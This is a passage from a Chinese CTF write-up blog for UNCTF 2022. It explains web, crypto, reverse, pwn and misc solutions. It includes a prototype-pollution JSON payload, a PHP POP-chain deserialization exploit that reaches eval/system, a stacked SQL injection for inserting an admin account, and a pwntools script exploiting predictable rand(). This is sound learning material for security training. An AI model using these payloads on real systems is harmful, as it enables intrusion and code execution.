<span class="token header-name keyword">Accept:</span> text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
<span class="token header-name keyword">Accept-Language:</span> zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
<span class="token header-name keyword">Accept-Encoding:</span> gzip, deflate
<span class="token header-name keyword">Connection:</span> close
<span class="token header-name keyword">Upgrade-Insecure-Requests:</span> 1
<span class="token header-name keyword">Content-Length:</span> 28
<span class="token header-name keyword">Content-Type:</span> application/json<span class="token application/json">

<span class="token operator">&amp;</span>#<span class="token number">123</span><span class="token punctuation">;</span><span class="token string">"__proto__"</span><span class="token punctuation">:</span><span class="token operator">&amp;</span>#<span class="token number">123</span><span class="token punctuation">;</span><span class="token string">"id"</span><span class="token punctuation">:</span><span class="token string">"unctf"</span><span class="token operator">&amp;</span>#<span class="token number">125</span><span class="token punctuation">;</span><span class="token operator">&amp;</span>#<span class="token number">125</span><span class="token punctuation">;</span>
</span></code></pre>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/wps19.jpg"> </p>
<h2 id="poppop-中国人民公安大学"><a href="#poppop-中国人民公安大学" class="headerlink" title="poppop-中国人民公安大学"></a>poppop-中国人民公安大学</h2><p> pop链：_destruct()-&gt; _toString()-&gt; _call()</p>
<pre class=" language-php"><code class="language-php"><span class="token delimiter">&lt;?php</span>
<span class="token keyword">class</span> <span class="token class-name">A</span><span class="token operator">&amp;</span><span class="token shell-comment comment">#123;</span>
    <span class="token keyword">public</span> <span class="token variable">$code</span> <span class="token operator">=</span> <span class="token string">""</span><span class="token punctuation">;</span>
    <span class="token keyword">function</span> <span class="token function">__construct</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
    <span class="token operator">&amp;</span><span class="token shell-comment comment">#123;</span>
        <span class="token variable">$this</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">code</span> <span class="token operator">=</span><span class="token string">"system('set');"</span><span class="token punctuation">;</span>
    <span class="token operator">&amp;</span><span class="token shell-comment comment">#125;</span>
    <span class="token keyword">function</span> <span class="token function">__call</span><span class="token punctuation">(</span><span class="token variable">$method</span><span class="token punctuation">,</span><span class="token variable">$args</span><span class="token punctuation">)</span><span class="token operator">&amp;</span><span class="token shell-comment comment">#123;</span>

        <span class="token function">eval</span><span class="token punctuation">(</span><span class="token variable">$this</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">code</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

    <span class="token operator">&amp;</span><span class="token shell-comment comment">#125;</span>
    <span class="token keyword">function</span> <span class="token function">__wakeup</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token operator">&amp;</span><span class="token shell-comment comment">#123;</span>
         <span class="token variable">$this</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">code</span> <span class="token operator">=</span> <span class="token string">""</span><span class="token punctuation">;</span>
    <span class="token operator">&amp;</span><span class="token shell-comment comment">#125;</span>
<span class="token operator">&amp;</span><span class="token shell-comment comment">#125;</span>

<span class="token keyword">class</span> <span class="token class-name">B</span><span class="token operator">&amp;</span><span class="token shell-comment comment">#123;</span>
    <span class="token keyword">public</span> <span class="token variable">$key</span><span class="token punctuation">;</span>
    <span class="token keyword">function</span> <span class="token function">__destruct</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token operator">&amp;</span><span class="token shell-comment comment">#123;</span>
        <span class="token keyword">echo</span> <span class="token variable">$this</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">key</span><span class="token punctuation">;</span>
    <span class="token operator">&amp;</span><span class="token shell-comment comment">#125;</span>
<span class="token operator">&amp;</span><span class="token shell-comment comment">#125;</span>
<span class="token keyword">class</span> <span class="token class-name">C</span><span class="token operator">&amp;</span><span class="token shell-comment comment">#123;</span>
    <span class="token keyword">private</span> <span class="token variable">$key2</span><span class="token punctuation">;</span>
    <span class="token keyword">function</span> <span class="token function">__construct</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
    <span class="token operator">&amp;</span><span class="token shell-comment comment">#123;</span>
        <span class="token variable">$this</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">key2</span> <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">A</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token operator">&amp;</span><span class="token shell-comment comment">#125;</span>
    <span class="token keyword">function</span> <span class="token function">__toString</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
    <span class="token operator">&amp;</span><span class="token shell-comment comment">#123;</span>
        <span class="token keyword">return</span> <span class="token variable">$this</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">key2</span><span class="token operator">-</span><span class="token operator">></span><span class="token function">abab</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token operator">&amp;</span><span class="token shell-comment comment">#125;</span>
<span class="token operator">&amp;</span><span class="token shell-comment comment">#125;</span>

<span class="token variable">$a</span> <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">B</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$a</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">key</span><span class="token operator">=</span><span class="token keyword">new</span> <span class="token class-name">C</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$b</span><span class="token operator">=</span><span class="token keyword">new</span> <span class="token class-name">A</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">print</span> <span class="token punctuation">(</span><span class="token function">urlencode</span><span class="token punctuation">(</span><span class="token function">serialize</span><span class="token punctuation">(</span><span class="token variable">$a</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre>
<p>然后把A类变量数+3绕过wakeup</p>
<p> <img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/image-20221120152415893.png"></p>
<h2 id="我太喜欢bilibili大学啦修复版-中北大学"><a href="#我太喜欢bilibili大学啦修复版-中北大学" class="headerlink" title="我太喜欢bilibili大学啦修复版-中北大学"></a>我太喜欢bilibili大学啦修复版-中北大学</h2><p> 直接搜索hint得到hint_1，base64解码得到admin_unctf.php</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/wps21.jpg"> </p>
<p>访问admin_unctf.php，查看源代码，发现</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/image-20221120104739316.png" alt="image-20221120104739316"></p>
<p>于是bp抓包，发现hint_2，base64解码得到unctf2022&#x2F;unctf2022</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/wps22.jpg"> </p>
<p>于是直接登录，base64解码得到flag</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/wps23.jpg"> </p>
<h2 id="给你一刀-西南科技大学"><a href="#给你一刀-西南科技大学" class="headerlink" title="给你一刀-西南科技大学"></a>给你一刀-西南科技大学</h2><p>thinkphp v5著名漏洞，直接随便搜一个poc</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/image-20221116113850955.png"></p>
<h2 id="Sqlsql-中国人民公安大学："><a href="#Sqlsql-中国人民公安大学：" class="headerlink" title="Sqlsql-中国人民公安大学："></a>Sqlsql-中国人民公安大学：</h2><p>随便取个姓名和学号注册、登录，做完题后查看成绩显示</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/image-20221120162324306.png"></p>
<p>猜测用admin登录后查看成绩就能得到flag</p>
<p>但是注册页面用admin注册显示</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/image-20221120162601809.png"></p>
<p>登录界面我们又不知道admin的学号，所以想到尝试用insert语句修改admin的学号</p>
<p>打开源码</p>
<p>注册页面发现表名为users，有三个字段</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/image-20221120180755105.png"></p>
<p>然后寻找注入点，发现登陆和注册页面都对输入做了过滤，只有提交成绩时没有过滤</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/image-20221120174352679.png"></p>
<p>于是在做题界面做完题提交时抓包，修改变量，使用堆叠注入插入insert语句</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/image-20221120181129470.png"></p>
<p>使用admin，123456登陆并查看成绩</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/image-20221117222542638.png"></p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/image-20221120174605608.png"></p>
<h1 id="CRYPTO"><a href="#CRYPTO" class="headerlink" title="CRYPTO:"></a>CRYPTO:</h1><h2 id="md5-1-西南科技大学"><a href="#md5-1-西南科技大学" class="headerlink" title="md5-1-西南科技大学"></a>md5-1-西南科技大学</h2><p>直接把所有密文拿去md5解密得到flag</p>
<h2 id="md5-2-西南科技大学"><a href="#md5-2-西南科技大学" class="headerlink" title="md5-2-西南科技大学"></a>md5-2-西南科技大学</h2><p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/wps25.jpg"> </p>
<p>解出来后一个个md5解密</p>
<h2 id="dddd-西南科技大学"><a href="#dddd-西南科技大学" class="headerlink" title="dddd-西南科技大学"></a>dddd-西南科技大学</h2><p>把1转化成.,把0转化成-,把&#x2F;转化成 ,直接摩斯密码解密，再url解码</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/wps26.jpg"> </p>
<h2 id="Single-table-西南科技大学"><a href="#Single-table-西南科技大学" class="headerlink" title="Single table-西南科技大学"></a>Single table-西南科技大学</h2><p> 普莱菲尔密码稍微修改</p>
<p><a target="_blank" rel="noopener" href="https://rumkin.com/tools/cipher/playfair/%E5%9C%A8%E7%BA%BF%E8%A7%A3%E5%AF%86">https://rumkin.com/tools/cipher/playfair/在线解密</a></p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/image-20221120115244514.png"></p>
<p> 然后把顺序换一下</p>
<h2 id="Multi-table-西南科技大学"><a href="#Multi-table-西南科技大学" class="headerlink" title="Multi table-西南科技大学"></a>Multi table-西南科技大学</h2><p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/image-20221116001126488.png"></p>
<h2 id="caesar-西南科技大学"><a href="#caesar-西南科技大学" class="headerlink" title="caesar-西南科技大学"></a>caesar-西南科技大学</h2><p> 照着base64表一个个右移19位</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/image-20221120114139652.png"></p>
<h2 id="easy-RSA-中国人民公安大学"><a href="#easy-RSA-中国人民公安大学" class="headerlink" title="easy_RSA-中国人民公安大学"></a>easy_RSA-中国人民公安大学</h2><p>直接用lazzaro佬的p高位泄露脚本sagemath一把梭</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/wps27.jpg"> </p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/wps28.jpg"> </p>
<h2 id="ezxor-浙江师范大学"><a href="#ezxor-浙江师范大学" class="headerlink" title="ezxor-浙江师范大学"></a>ezxor-浙江师范大学</h2><p>网上找一个多次一密脚本</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/wps29.jpg"> </p>
<p>用得到的结果去网上搜索相似的文章得到明文，第一段明文和第一段密文异或得到flag</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/wps30.jpg"> </p>
<h2 id="babyRSA-广东海洋大学"><a href="#babyRSA-广东海洋大学" class="headerlink" title="babyRSA-广东海洋大学"></a>babyRSA-广东海洋大学</h2><p>直接用lazzaro佬的m高位泄露脚本sagemath一把梭</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/image-20221116111931343.png"></p>
<h2 id="今晚吃什么-金陵科技学院"><a href="#今晚吃什么-金陵科技学院" class="headerlink" title="今晚吃什么-金陵科技学院"></a>今晚吃什么-金陵科技学院</h2><p>把10000转化成A，00000转化成B</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/image-20221116124557353.png"></p>
<p>在线解密培根密码</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/image-20221116124628450.png"></p>
<h2 id="ezRSA-广东海洋大学"><a href="#ezRSA-广东海洋大学" class="headerlink" title="ezRSA-广东海洋大学"></a>ezRSA-广东海洋大学</h2><p><a target="_blank" rel="noopener" href="http://www.factordb.com/%E5%9C%A8%E7%BA%BF%E5%88%86%E8%A7%A3n">http://www.factordb.com/在线分解n</a></p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/image-20221116133920994.png"></p>
<p>然后直接用风二西佬的n是p的r次方脚本一把梭</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/image-20221116133934005.png"></p>
<h1 id="REVERSE"><a href="#REVERSE" class="headerlink" title="REVERSE:"></a>REVERSE:</h1><h2 id="whereisyourkey-广东海洋大学"><a href="#whereisyourkey-广东海洋大学" class="headerlink" title="whereisyourkey-广东海洋大学"></a>whereisyourkey-广东海洋大学</h2><p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/wps31.jpg"> </p>
<p>对数据处理后转ascii得到key：yesiamflag</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/wps32.jpg"> </p>
<h2 id="ezzzzre-广东海洋大学"><a href="#ezzzzre-广东海洋大学" class="headerlink" title="ezzzzre-广东海洋大学"></a>ezzzzre-广东海洋大学</h2><p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/wps33.jpg"> </p>
<p>对数据处理后转ascii得到key：KESSYAcG</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/wps34.jpg"> </p>
<h1 id="PWN"><a href="#PWN" class="headerlink" title="PWN:"></a>PWN:</h1><h2 id="welcomeUNCTF2022-云南警官学院"><a href="#welcomeUNCTF2022-云南警官学院" class="headerlink" title="welcomeUNCTF2022-云南警官学院"></a>welcomeUNCTF2022-云南警官学院</h2><p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/wps35.jpg"> </p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/wps36.jpg"> </p>
<h2 id="石头剪刀布-西华大学："><a href="#石头剪刀布-西华大学：" class="headerlink" title="石头剪刀布-西华大学："></a>石头剪刀布-西华大学：</h2><p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/image-20221120143316923.png"></p>
<p>当对方输入1时，我们输入0；当对方输入2时，我们输入1；当对方输入0时，我们输入2。</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/image-20221120145110829.png"></p>
<p>在网上找个srand()&#x2F;rand()漏洞的解题脚本照着改一下得到：</p>
<pre class=" language-python"><code class="language-python"><span class="token keyword">from</span> pwn <span class="token keyword">import</span> <span class="token operator">*</span>
<span class="token keyword">from</span> ctypes <span class="token keyword">import</span> <span class="token operator">*</span>
 
p <span class="token operator">=</span> remote<span class="token punctuation">(</span><span class="token string">"node.yuzhian.com.cn"</span><span class="token punctuation">,</span><span class="token number">36605</span><span class="token punctuation">)</span>

libc <span class="token operator">=</span> cdll<span class="token punctuation">.</span>LoadLibrary<span class="token punctuation">(</span><span class="token string">'libc.so.6'</span><span class="token punctuation">)</span>

libc<span class="token punctuation">.</span>srand<span class="token punctuation">(</span><span class="token number">10</span><span class="token punctuation">)</span>

payload <span class="token operator">=</span> <span class="token number">0</span>

p<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span><span class="token string">'y'</span><span class="token punctuation">)</span>
 
<span class="token keyword">for</span> i <span class="token keyword">in</span> range<span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">,</span><span class="token number">101</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    v1 <span class="token operator">=</span> libc<span class="token punctuation">.</span>rand<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token operator">%</span><span class="token number">3</span>
    <span class="token keyword">if</span> v1 <span class="token operator">==</span> <span class="token number">1</span><span class="token punctuation">:</span>
        payload <span class="token operator">=</span> <span class="token number">0</span>
    <span class="token keyword">elif</span> v1 <span class="token operator">==</span> <span class="token number">2</span><span class="token punctuation">:</span>
        payload <span class="token operator">=</span> <span class="token number">1</span>
    <span class="token keyword">elif</span> v1 <span class="token operator">==</span> <span class="token number">0</span><span class="token punctuation">:</span>
        payload <span class="token operator">=</span> <span class="token number">2</span>
    p<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span>str<span class="token punctuation">(</span>payload<span class="token punctuation">)</span><span class="token punctuation">)</span>
    
p<span class="token punctuation">.</span>interactive<span class="token punctuation">(</span><span class="token punctuation">)</span>
</code></pre>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/image-20221120145710990.png"></p>
<h1 id="MISC"><a href="#MISC" class="headerlink" title="MISC:"></a>MISC:</h1><h2 id="magic-word-西南科技大学"><a href="#magic-word-西南科技大学" class="headerlink" title="magic_word-西南科技大学"></a>magic_word-西南科技大学</h2><p>复制全文到零宽度字符隐写</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/image-20221115192248275.png"></p>
<h2 id="syslog-浙江师范大学"><a href="#syslog-浙江师范大学" class="headerlink" title="syslog-浙江师范大学"></a>syslog-浙江师范大学</h2><p>使用winrar修复压缩包之后，发现有一个被加密的flag文件，尝试爆破没爆破出来，用winhex打开syslog文件，搜索password</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/wps37.jpg"> </p>
<p>然后base64解码得到压缩包密码，打开flag文件</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/image-20221118152205713.png"></p>
<h2 id="巨鱼-河南理工大学"><a href="#巨鱼-河南理工大学" class="headerlink" title="巨鱼-河南理工大学"></a>巨鱼-河南理工大学</h2><p>修改fish.png图片高度，得到压缩包密码</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/image-20221115191835412.png"></p>
<p>打开压缩包，发现文件头错误</p>
<p>于是修复压缩包，然后得到一张图片和一个ppt文件，搜索图片中化学式，发现有多种名称，分别尝试，最终ppt密码为666，</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/image-20221115192053039.png"></p>
<h2 id="我小心海也绝非鳝类-中国计量大学现代科技学院"><a href="#我小心海也绝非鳝类-中国计量大学现代科技学院" class="headerlink" title="我小心海也绝非鳝类-中国计量大学现代科技学院"></a>我小心海也绝非鳝类-中国计量大学现代科技学院</h2><p>Winhex打开图片，发现尾部有一串base64字符，解码后提示easylsb，图片中有一串字符，直接lsb加密隐写不行，于是basecrack尝试解码</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/wps38.jpg"> </p>
<p>解码得到flaginmd5，然后lsb加密隐写，得到</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/wps39.jpg"> </p>
<p>根据密码flaginmd5，把字符串32个为一组，分成21组，分别md5解密得到flag</p>
<h2 id="找得到我吗-闽南师范大学"><a href="#找得到我吗-闽南师范大学" class="headerlink" title="找得到我吗-闽南师范大学"></a>找得到我吗-闽南师范大学</h2><p>改后缀名为zip打开document文件</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/wps40.jpg"> </p>
<p>得到flag：</p>
<p>flag{You_find_me!}</p>
<h2 id="zhiyin-中国人民公安大学"><a href="#zhiyin-中国人民公安大学" class="headerlink" title="zhiyin-中国人民公安大学"></a>zhiyin-中国人民公安大学</h2><p>winhex打开zhiyin.png，文件尾发现摩斯密码</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/image-20221116083809851.png"></p>
<p>解码得到</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/image-20221118153854419.png"></p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/image-20221116083947835.png"></p>
<p>可以看出lanqiu.png是逆转的jpg图片</p>
<p>python逆转nanqiu.png</p>
<p><img src="C:\Users\lenovo\AppData\Roaming\Typora\typora-user-images\image-20221116083707763.png"></p>
<p>得到</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/image-20221116084030144.png"></p>
<p>因为密码不确定，于是把几种可能的密码写一个字典</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/image-20221116084108201.png"></p>
<p>最终得到flag：</p>
<p>flag{M1sic_1s_greAt}</p>
<h2 id="清和fan-江西警察学院"><a href="#清和fan-江西警察学院" class="headerlink" title="清和fan-江西警察学院"></a>清和fan-江西警察学院</h2><p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/image-20221116085104777.png"></p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/image-20221116085125681.png"></p>
<p>得到密码836885_2022&#x2F;05&#x2F;20</p>
<p>打开压缩包，得到一张图片和另一个加密的压缩包，尝试各种图片中动漫人物的名字没有解密出来，于是尝试lsb隐写得到密码</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/image-20221116092235574.png"></p>
<p>用mmsstv听音频</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/image-20221116123216640.png"></p>
<p>得到密码，打开压缩包，里面一个txt文件，是零宽度字符隐写</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/image-20221116123600234.png"></p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/image-20221116123626532.png"></p>
<h2 id="芝麻开门-广东海洋大学"><a href="#芝麻开门-广东海洋大学" class="headerlink" title="芝麻开门-广东海洋大学"></a>芝麻开门-广东海洋大学</h2><p>winhex打开压缩包，发现base64字符</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/image-20221116143710702.png"></p>
<p>base64解码得到密码</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/image-20221116143816080.png"></p>
<p>用密码尝试lsb加密隐写</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/image-20221116143750010.png"></p>
<p>得到flag</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/image-20221116143642654.png"></p>
<h2 id="In-the-Morse-Garden-陆军工程大学"><a href="#In-the-Morse-Garden-陆军工程大学" class="headerlink" title="In_the_Morse_Garden-陆军工程大学"></a>In_the_Morse_Garden-陆军工程大学</h2><p>用pdf编辑器打开pdf文件，移开图片，看到base字符</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/image-20221116145801925.png"></p>
<p>base解码</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/image-20221116145820671.png"></p>
<p>把依古比古替换成.玛卡巴卡替换成-，然后摩斯密码解密</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/image-20221116145915027.png"></p>
<p>得到flag：</p>
<p>UNCTF{WAN_AN_MAKA_BAKAAAAA!}</p>
<h2 id="剥茧抽丝-内蒙古警察职业学院"><a href="#剥茧抽丝-内蒙古警察职业学院" class="headerlink" title="剥茧抽丝-内蒙古警察职业学院"></a>剥茧抽丝-内蒙古警察职业学院</h2><p>010打开压缩包，在文件尾端发现密码</p>
